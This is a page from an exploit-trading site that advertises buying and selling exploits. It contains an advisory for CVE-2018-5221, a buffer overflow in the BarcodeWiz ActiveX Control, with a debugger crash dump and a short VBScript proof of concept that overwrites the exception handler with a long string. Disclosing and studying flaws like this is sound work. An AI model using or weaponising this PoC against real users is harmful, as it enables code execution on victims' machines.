0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC) Vulnerability
[+] Credits: John Page (aka hyp3rlinx) Vendor: ================= www.barcodewiz.com Product: ============= BarcodeWiz ActiveX Control < 6.7 BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes; Choose from hundreds of label layouts; Export as PDF or XPS. Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== CVE-2018-5221 Security Issue: ================ BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite . This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered. SEH chain of main thread Address SE handler 0018DAC0 kernel32.754E48F3 0018EE34 41414141 41414141 *** CORRUPT ENTRY *** Exception Code: ACCESS_VIOLATION Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL) SEH Chain: -------------------------------------------------- 1 41414141 Called From Returns To -------------------------------------------------- BarcodeWiz.2045665 BarcodeWiz.202FF50 BarcodeWiz.202FF50 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data Exploit/POC: ============= <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' /> <script language='vbscript'> PAYLOAD=String(12308, "A") VICTIM.BottomText = PAYLOAD </script> # 0day.today [2024-12-24] #